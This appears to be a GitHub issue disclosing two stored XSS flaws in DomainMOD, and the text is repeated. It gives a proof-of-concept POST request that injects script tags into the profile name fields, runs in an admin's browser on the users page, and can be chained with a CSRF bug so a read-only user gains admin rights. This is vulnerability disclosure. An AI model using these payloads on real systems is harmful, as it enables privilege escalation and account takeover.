You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
There are two Stored XSS vulnerability.
read-only user use the add the Stored XSS and CSRF can add administrator account or change the read-only user to admin or change admin password……
poc:
after read-only user login
post url https://demo.domainmod.org/settings/profile/
post data:new_first_name=test%22%3E%3Cscript%3Ealert%28%2F1111%2F%29%3C%2Fscript%3E&new_last_name=test%22%3E%3Cscript%3Ealert%28%2F2222%2F%29%3C%2Fscript%3E&new_email_address=test%40test.com&new_currency=USD&new_timezone=Canada%2FPacific&new_expiration_emails=0
then the admin login ,open the url https://demo.domainmod.org/admin/users/. the javascript will execution. with CSRF vulnerability(#65) , a read-only user can add administrator account or change the read-only user to admin or change admin password……
The text was updated successfully, but these errors were encountered:
There are two Stored XSS vulnerability.
read-only user use the add the Stored XSS and CSRF can add administrator account or change the read-only user to admin or change admin password……
poc:
after read-only user login
post url
https://demo.domainmod.org/settings/profile/
post data:
new_first_name=test%22%3E%3Cscript%3Ealert%28%2F1111%2F%29%3C%2Fscript%3E&new_last_name=test%22%3E%3Cscript%3Ealert%28%2F2222%2F%29%3C%2Fscript%3E&new_email_address=test%40test.com&new_currency=USD&new_timezone=Canada%2FPacific&new_expiration_emails=0
then the admin login ,open the url https://demo.domainmod.org/admin/users/. the javascript will execution. with CSRF vulnerability(#65) , a read-only user can add administrator account or change the read-only user to admin or change admin password……
The text was updated successfully, but these errors were encountered: